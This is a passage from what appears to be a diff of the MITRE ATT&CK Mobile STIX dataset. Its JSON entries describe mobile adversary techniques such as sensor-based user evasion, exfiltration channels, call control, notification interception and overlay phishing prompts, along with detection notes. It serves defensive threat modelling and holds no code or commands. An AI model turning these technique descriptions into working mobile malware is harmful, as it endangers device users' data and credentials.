"x_mitre_deprecated": false, + "revoked": true, + "description": "Adversaries may attempt to avoid detection by hiding malicious behavior from the user. By doing this, an adversary’s modifications would most likely remain installed on the device for longer, allowing the adversary to continue to operate on that device. \n\nWhile there are many ways this can be accomplished, one method is by using the device’s sensors. By utilizing the various motion sensors on a device, such as accelerometer or gyroscope, an application could detect that the device is being interacted with. 
That way, the application could continue to run while the device is not in use but cease operating while the user is using the device, hiding anything that would indicate malicious activity was ongoing. Accessing the sensors in this way does not require any permissions from the user, so it would be completely transparent.", + "modified": "2022-04-11T20:06:56.032Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "User Evasion", + "x_mitre_detection": "Mobile security products may be able to detect some forms of user evasion. Otherwise, the act of hiding malicious activity could be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "defense-evasion" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--32063d7f-0a39-440d-a4a3-2694488f96cc", + "created": "2022-04-01T15:43:45.913Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1646", + "url": "https://attack.mitre.org/techniques/T1646" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-29.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-29" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. 
Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.", + "modified": "2022-04-08T16:25:44.552Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over C2 Channel", + "x_mitre_detection": "Exfiltration over C2 channel can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-20T18:49:53.301Z", + "name": "Exploitation for Privilege Escalation", + "description": "Adversaries may exploit software vulnerabilities in order to to elevate privileges. Exploitation of a software vulnerability occurs when an adversary takes advantage of a programming error in an application, service, within the operating system software, or kernel itself to execute adversary-controlled code. Security constructions, such as permission levels, will often hinder access to information and use of certain techniques. Adversaries will likely need to perform privilege escalation to include use of software exploitation to circumvent those restrictions. \n\nWhen initially gaining access to a device, an adversary may be operating within a lower privileged process which will prevent them from accessing certain resources on the system. Vulnerabilities may exist, usually in operating system components and applications running at higher permissions, that can be exploited to gain higher levels of access on the system. 
This could enable someone to move from unprivileged or user- level permission to root permissions depending on the component that is vulnerable. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "privilege-escalation" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Mobile security products can potentially utilize device APIs to determine if a device has been rooted or jailbroken. Application vetting services could potentially determine if an application contains code designed to exploit vulnerabilities.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351c0927-2fc1-4a2c-ad84-cbbee7eb8172", + "created": "2017-10-25T14:48:29.405Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1404", + "external_id": "T1404" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-26.html", + "external_id": "APP-26" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:31:37.189Z", + "name": "Call Control", + "description": "Adversaries may make, forward, or block phone calls without user authorization. 
This could be used for adversary goals such as audio surveillance, blocking or forwarding calls from the device owner, or C2 communication.\n\nSeveral permissions may be used to programmatically control phone calls, including:\n\n* `ANSWER_PHONE_CALLS` - Allows the application to answer incoming phone calls(Citation: Android Permissions)\n* `CALL_PHONE` - Allows the application to initiate a phone call without going through the Dialer interface(Citation: Android Permissions)\n* `PROCESS_OUTGOING_CALLS` - Allows the application to see the number being dialed during an outgoing call with the option to redirect the call to a different number or abort the call altogether(Citation: Android Permissions)\n* `MANAGE_OWN_CALLS` - Allows a calling application which manages its own calls through the self-managed `ConnectionService` APIs(Citation: Android Permissions)\n* `BIND_TELECOM_CONNECTION_SERVICE` - Required permission when using a `ConnectionService`(Citation: Android Permissions)\n* `WRITE_CALL_LOG` - Allows an application to write to the device call log, potentially to hide malicious phone calls(Citation: Android Permissions)\n\nWhen granted some of these permissions, an application can make a phone call without opening the dialer first. However, if an application desires to simply redirect the user to the dialer with a phone number filled in, it can launch an Intent using `Intent.ACTION_DIAL`, which requires no specific permissions. 
This then requires the user to explicitly initiate the call or use some form of [Input Injection](https://attack.mitre.org/techniques/T1516) to programmatically initiate it.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "impact" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_contributors": [ + "Gaetan van Diemen, ThreatFabric" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Users can view their default phone app in device settings. Users can review available call logs for irregularities, such as missing or unrecognized calls.", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--351ddf79-2d3a-41b4-9bef-82ea5d3ccd69", + "created": "2021-09-20T13:42:20.824Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1616", + "external_id": "T1616" + }, + { + "source_name": "Android Permissions", + "description": "Google. (2021, August 11). Manifest.permission. 
Retrieved September 22, 2021.", + "url": "https://developer.android.com/reference/android/Manifest.permission" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-41.html", + "external_id": "APP-41" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-42.html", + "external_id": "CEL-42" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-36.html", + "external_id": "CEL-36" + }, + { + "source_name": "NIST Mobile Threat Catalogue", + "url": "https://pages.nist.gov/mobile-threat-catalogue/cellular-threats/CEL-18.html", + "external_id": "CEL-18" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--37047267-3e56-453c-833e-d92b68118120", + "created": "2022-04-06T13:22:57.683Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639.001", + "url": "https://attack.mitre.org/techniques/T1639/001" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over an un-encrypted network protocol other than that of the existing command and control channel. 
The data may also be sent to an alternate network location from the main command and control server.\n\nAdversaries may opt to obfuscate this data, without the use of encryption, within network protocols that are natively unencrypted (such as HTTP, FTP, or DNS). Adversaries may employ custom or publicly available encoding/compression algorithms (such as base64) or embed data within protocol headers and fields.", + "modified": "2022-04-06T13:23:10.087Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Unencrypted Non-C2 Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": true, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-16T18:27:42.752Z", + "name": "Broadcast Receivers", + "description": "Adversaries may establish persistence using system mechanisms that trigger execution based on specific events. Mobile operating systems have means to subscribe to events such as receiving an SMS message, device boot completion, or other device activities. \n\nAn intent is a message passed between Android applications or system components. Applications can register to receive broadcast intents at runtime, which are system-wide intents delivered to each app when certain events happen on the device, such as network changes or the user unlocking the screen. Malicious applications can then trigger certain actions within the app based on which broadcast intent was received. 
\n\nIn addition to Android system intents, malicious applications can register for intents broadcasted by other applications. This allows the malware to respond based on actions in other applications. This behavior typically indicates a more intimate knowledge, or potentially the targeting of specific devices, users, or applications. \n\nIn Android 8 (API level 26), broadcast intent behavior was changed, limiting the implicit intents that applications can register for in the manifest. In most cases, applications that register through the manifest will no longer receive the broadcasts. Now, applications must register context-specific broadcast receivers while the user is actively using the app.(Citation: Android Changes to System Broadcasts) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_contributors": [ + "Alex Hinchliffe, Palo Alto Networks" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can detect which broadcast intents an application registers for and which permissions it requests. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--3775a580-a1d1-46c4-8147-c614a715f2e9", + "created": "2022-03-30T14:41:00.672Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1624/001", + "external_id": "T1624.001" + }, + { + "source_name": "Android Changes to System Broadcasts", + "description": "Google. (2019, December 27). Broadcasts Overview. 
Retrieved January 27, 2020.", + "url": "https://developer.android.com/guide/components/broadcasts#changes-system-broadcasts" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3911658a-6506-4deb-9ab4-595a51ae71ad", + "created": "2017-10-25T14:48:16.650Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1436", + "url": "https://attack.mitre.org/techniques/T1436" + } + ], + "x_mitre_deprecated": true, + "revoked": false, + "description": "Adversaries may communicate over a commonly used port to bypass firewalls or network detection systems and to blend with normal network activity to avoid more detailed inspection. 
\n\nThey may use commonly open ports such as\n\n* TCP:80 (HTTP)\n* TCP:443 (HTTPS)\n* TCP:25 (SMTP)\n* TCP/UDP:53 (DNS)\n\nThey may use the protocol associated with the port or a completely different protocol.", + "modified": "2022-04-06T15:40:47.556Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Commonly Used Port", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "command-and-control" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "exfiltration" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--393e8c12-a416-4575-ba90-19cc85656796", + "created": "2017-10-25T14:48:26.104Z", + "x_mitre_version": "1.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1439", + "url": "https://attack.mitre.org/techniques/T1439" + }, + { + "source_name": "mHealth", + "url": "https://experts.illinois.edu/en/publications/security-concerns-in-android-mhealth-apps", + "description": "D. He et al.. (2014). Security Concerns in Android mHealth Apps. Retrieved December 24, 2016." 
+ }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-0.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-0" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-1.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-1" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "If network traffic between the mobile device and remote servers is unencrypted or is encrypted in an insecure manner, then an adversary positioned on the network can eavesdrop on communication.(Citation: mHealth)", + "modified": "2022-04-05T20:17:46.147Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Eavesdrop on Insecure Network Communication", + "x_mitre_detection": "", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "network-effects" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Without Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-15T16:26:05.050Z", + "name": "Access Notifications", + "description": "Adversaries may collect data within notifications sent by the operating system or other applications. Notifications may contain sensitive data such as one-time authentication codes sent over SMS, email, or other mediums. In the case of Credential Access, adversaries may attempt to intercept one-time code sent to the device. 
Adversaries can also dismiss notifications to prevent the user from noticing that the notification has arrived and can trigger action buttons contained within notifications.(Citation: ESET 2FA Bypass) ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Application vetting services can look for applications requesting the `BIND_NOTIFICATION_LISTENER_SERVICE` permission in a service declaration. Users can also inspect and modify the list of applications that have notification access through the device settings (e.g. Apps & notification -> Special app access -> Notification access). ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android" + ], + "x_mitre_version": "1.2", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--39dd7871-f59b-495f-a9a5-3cb8cc50c9b2", + "created": "2019-09-15T15:26:08.183Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1517", + "external_id": "T1517" + }, + { + "source_name": "ESET 2FA Bypass", + "description": "Lukáš Štefanko. (2019, June 17). Malware sidesteps Google permissions policy with new 2FA bypass technique. 
Retrieved September 15, 2019.", + "url": "https://www.welivesecurity.com/2019/06/17/malware-google-permissions-2fa-bypass/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3b0b604f-10db-41a0-b54c-493124d455b9", + "created": "2017-10-25T14:48:14.982Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1410", + "url": "https://attack.mitre.org/techniques/T1410" + }, + { + "source_name": "Skycure-Profiles", + "url": "https://www.skycure.com/blog/malicious-profiles-the-sleeping-giant-of-ios-security/", + "description": "Yair Amit. (2013, March 12). Malicious Profiles - The Sleeping Giant of iOS Security. Retrieved December 22, 2016." + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "An adversary may capture network traffic to and from the device to obtain credentials or other sensitive data, or redirect network traffic to flow through an adversary-controlled gateway to do the same.\n\nA malicious app could register itself as a VPN client on Android or iOS to gain access to network packets. 
However, on both platforms, the user must grant consent to the app to act as a VPN client, and on iOS the app requires a special entitlement that must be granted by Apple.\n\nAlternatively, if a malicious app is able to escalate operating system privileges, it may be able to use those privileges to gain access to network traffic.\n\nAn adversary could redirect network traffic to an adversary-controlled gateway by establishing a VPN connection or by manipulating the device's proxy settings. For example, Skycure (Citation: Skycure-Profiles) describes the ability to redirect network traffic by installing a malicious iOS Configuration Profile.\n\nIf applications encrypt their network traffic, sensitive data may not be accessible to an adversary, depending on the point of capture.", + "modified": "2022-04-15T17:52:24.123Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Network Traffic Capture or Redirection", + "x_mitre_detection": "On both Android and iOS the user must grant consent to an app to act as a VPN. 
Both platforms also provide visual context to the user in the top status bar when a VPN connection is in place.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "collection" + }, + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3dd58c80-4c2e-458c-9503-1b2cd273c4d2", + "created": "2017-10-25T14:48:34.407Z", + "x_mitre_version": "2.1", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1411", + "url": "https://attack.mitre.org/techniques/T1411" + }, + { + "source_name": "Felt-PhishingOnMobileDevices", + "url": "http://w2spconf.com/2011/papers/felt-mobilephishing.pdf", + "description": "A.P. Felt and D. Wagner. (2011, May 26). Phishing on Mobile Devices. Retrieved August 25, 2016." + }, + { + "source_name": "Android Background", + "url": "https://developer.android.com/guide/components/activities/background-starts", + "description": "Android Developers. (n.d.). Restrictions on starting activities from the background. Retrieved September 18, 2019." + }, + { + "source_name": "Android-getRunningTasks", + "url": "https://developer.android.com/reference/android/app/ActivityManager.html#getRunningTasks%28int%29", + "description": "Android. (n.d.). ActivityManager getRunningTasks documentation. Retrieved January 19, 2017." + }, + { + "source_name": "Cloak and Dagger", + "url": "http://cloak-and-dagger.org/", + "description": "Fratantonio, Y., et al.. (2017). Cloak & Dagger. 
Retrieved September 18, 2019." + }, + { + "source_name": "Group IB Gustuff Mar 2019", + "url": "https://www.group-ib.com/blog/gustuff", + "description": "Group-IB. (2019, March 28). Group-IB uncovers Android Trojan named «Gustuff» capable of targeting more than 100 global banking apps, cryptocurrency and marketplace applications. Retrieved September 3, 2019." + }, + { + "source_name": "eset-finance", + "url": "https://www.welivesecurity.com/2018/09/19/fake-finance-apps-google-play-target-around-world/", + "description": "Lukáš Štefanko. (2016, July 7). Fake finance apps on Google Play target users from around the world. Retrieved September 24, 2018." + }, + { + "source_name": "Hassell-ExploitingAndroid", + "url": "https://conference.hitb.org/hitbsecconf2011kul/materials/D1T1%20-%20Riley%20Hassell%20-%20Exploiting%20Androids%20for%20Fun%20and%20Profit.pdf", + "description": "R. Hassell. (2011, October 12-13). Exploiting Androids for Fun and Profit. Retrieved October 10, 2019." + }, + { + "source_name": "XDA Bubbles", + "url": "https://www.xda-developers.com/android-q-system-alert-window-deprecate-bubbles/", + "description": "Rahman, M.. (2019, May 8). Bubbles in Android Q will fully replace the overlay API in a future Android version. Retrieved September 18, 2019." + }, + { + "source_name": "NowSecure Android Overlay", + "url": "https://www.nowsecure.com/blog/2017/05/25/android-overlay-malware-system-alert-window-permission/", + "description": "Ramirez, T.. (2017, May 25). ‘SAW’-ing through the UI: Android overlay malware and the System Alert Window permission explained. Retrieved September 18, 2019." + }, + { + "source_name": "ThreatFabric Cerberus", + "url": "https://www.threatfabric.com/blogs/cerberus-a-new-banking-trojan-from-the-underworld.html", + "description": "ThreatFabric. (2019, August). Cerberus - A new banking Trojan from the underworld. Retrieved September 18, 2019." 
+ }, + { + "source_name": "StackOverflow-getRunningAppProcesses", + "url": "http://stackoverflow.com/questions/30619349/android-5-1-1-and-above-getrunningappprocesses-returns-my-application-packag", + "description": "Various. (n.d.). Android 5.1.1 and above - getRunningAppProcesses() returns my application package only. Retrieved January 19, 2017." + }, + { + "source_name": "Skycure-Accessibility", + "url": "https://www.skycure.com/blog/accessibility-clickjacking/", + "description": "Yair Amit. (2016, March 3). “Accessibility Clickjacking” – The Next Evolution in Android Malware that Impacts More Than 500 Million Devices. Retrieved December 21, 2016." + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-31.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-31" + } + ], + "x_mitre_deprecated": false, + "revoked": true, + "description": "The operating system and installed applications often have legitimate needs to prompt the user for sensitive information such as account credentials, bank account information, or Personally Identifiable Information (PII). Adversaries may mimic this functionality to prompt users for sensitive information.\n\nCompared to traditional PCs, the constrained display size of mobile devices may impair the ability to provide users with contextual information, making users more susceptible to this technique’s use.(Citation: Felt-PhishingOnMobileDevices)\n\nSpecific approaches to this technique include:\n\n### Impersonate the identity of a legitimate application\n\nA malicious application could impersonate the identity of a legitimate application (e.g. use the same application name and/or icon) and get installed on the device. 
The malicious app could then prompt the user for sensitive information.(Citation: eset-finance)\n\n### Display a prompt on top of a running legitimate application\n\nA malicious application could display a prompt on top of a running legitimate application to trick users into entering sensitive information into the malicious application rather than the legitimate application. Typically, the malicious application would need to know when the targeted application (and individual activity within the targeted application) is running in the foreground, so that the malicious application knows when to display its prompt. Android 5.0 and 5.1.1, respectively, increased the difficulty of determining the current foreground application through modifications to the `ActivityManager` API.(Citation: Android-getRunningTasks)(Citation: StackOverflow-getRunningAppProcesses). A malicious application can still abuse Android’s accessibility features to determine which application is currently in the foreground.(Citation: ThreatFabric Cerberus) Approaches to display a prompt include:\n\n* A malicious application could start a new activity on top of a running legitimate application.(Citation: Felt-PhishingOnMobileDevices)(Citation: Hassell-ExploitingAndroid) Android 10 places new restrictions on the ability for an application to start a new activity on top of another application, which may make it more difficult for adversaries to utilize this technique.(Citation: Android Background)\n* A malicious application could create an application overlay window on top of a running legitimate application. Applications must hold the `SYSTEM_ALERT_WINDOW` permission to create overlay windows. 
This permission is handled differently than typical Android permissions, and at least under certain conditions is automatically granted to applications installed from the Google Play Store.(Citation: Cloak and Dagger)(Citation: NowSecure Android Overlay)(Citation: Skycure-Accessibility) The `SYSTEM_ALERT_WINDOW` permission and its associated ability to create application overlay windows are expected to be deprecated in a future release of Android in favor of a new API.(Citation: XDA Bubbles)\n\n### Fake device notifications\n\nA malicious application could send fake device notifications to the user. Clicking on the device notification could trigger the malicious application to display an input prompt.(Citation: Group IB Gustuff Mar 2019)", + "modified": "2022-04-05T19:52:32.190Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Input Prompt", + "x_mitre_detection": "The user can view and manage which applications hold the SYSTEM_ALERT_WINDOW permission to create overlay windows on top of other apps through the device settings in Apps & notifications -> Special app access -> Display over other apps (the exact menu location may vary between Android versions).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "credential-access" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_domains": [ + "mobile-attack" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "attack-pattern", + "id": "attack-pattern--3e091a89-a493-4a6c-8e88-d57be19bb98d", + "created": "2022-04-06T13:19:33.785Z", + "x_mitre_version": "1.0", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "T1639", 
+ "url": "https://attack.mitre.org/techniques/T1639" + }, + { + "url": "https://pages.nist.gov/mobile-threat-catalogue/application-threats/APP-30.html", + "source_name": "NIST Mobile Threat Catalogue", + "external_id": "APP-30" + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "Adversaries may steal data by exfiltrating it over a different protocol than that of the existing command and control channel. The data may also be sent to an alternate network location from the main command and control server. \n\nAlternate protocols include FTP, SMTP, HTTP/S, DNS, SMB, or any other network protocol not being used as the main command and control channel. Different protocol channels could also include Web services such as cloud storage. Adversaries may opt to also encrypt and/or obfuscate these alternate channels. ", + "modified": "2022-04-29T17:29:00.038Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Exfiltration Over Alternative Protocol", + "x_mitre_detection": "Exfiltration Over Alternative Protocols can be difficult to detect, and therefore enterprises may be better served focusing on detection at other stages of adversarial behavior.", + "kill_chain_phases": [ + { + "phase_name": "exfiltration", + "kill_chain_name": "mitre-mobile-attack" + } + ], + "x_mitre_is_subtechnique": false, + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "x_mitre_domains": [ + "mobile-attack" + ], + "id": "attack-pattern--45dcbc83-4abc-4de1-b643-e528d1e9df09", + "type": "attack-pattern", + "created": "2017-10-25T14:48:24.069Z", + "revoked": true, + "external_references": [ + { + "source_name": "mitre-mobile-attack", + "url": "https://attack.mitre.org/techniques/T1460", + "external_id": "T1460" + } + ], + "modified": "2018-10-17T01:05:10.703Z", + "name": "Biometric Spoofing", + 
"x_mitre_version": "1.0", + "x_mitre_is_subtechnique": false + }, + { + "modified": "2023-03-16T18:26:46.043Z", + "name": "Boot or Logon Initialization Scripts", + "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts are part of the underlying operating system and are not accessible to the user unless the device has been rooted or jailbroken. ", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-mobile-attack", + "phase_name": "persistence" + } + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "On Android, Verified Boot can detect unauthorized modifications to the system partition.(Citation: Android-VerifiedBoot) Android's SafetyNet API provides remote attestation capabilities, which could potentially be used to identify and respond to compromise devices. Samsung Knox provides a similar remote attestation capability on supported Samsung devices. ", + "x_mitre_domains": [ + "mobile-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_platforms": [ + "Android", + "iOS" + ], + "x_mitre_version": "2.1", + "x_mitre_tactic_type": [ + "Post-Adversary Device Access" + ], + "type": "attack-pattern", + "id": "attack-pattern--46d818a5-67fa-4585-a7fc-ecf15376c8d5", + "created": "2017-10-25T14:48:31.294Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1398", + "external_id": "T1398" + }, + { + "source_name": "Android-VerifiedBoot", + "description": "Android. (n.d.). Verified Boot. 
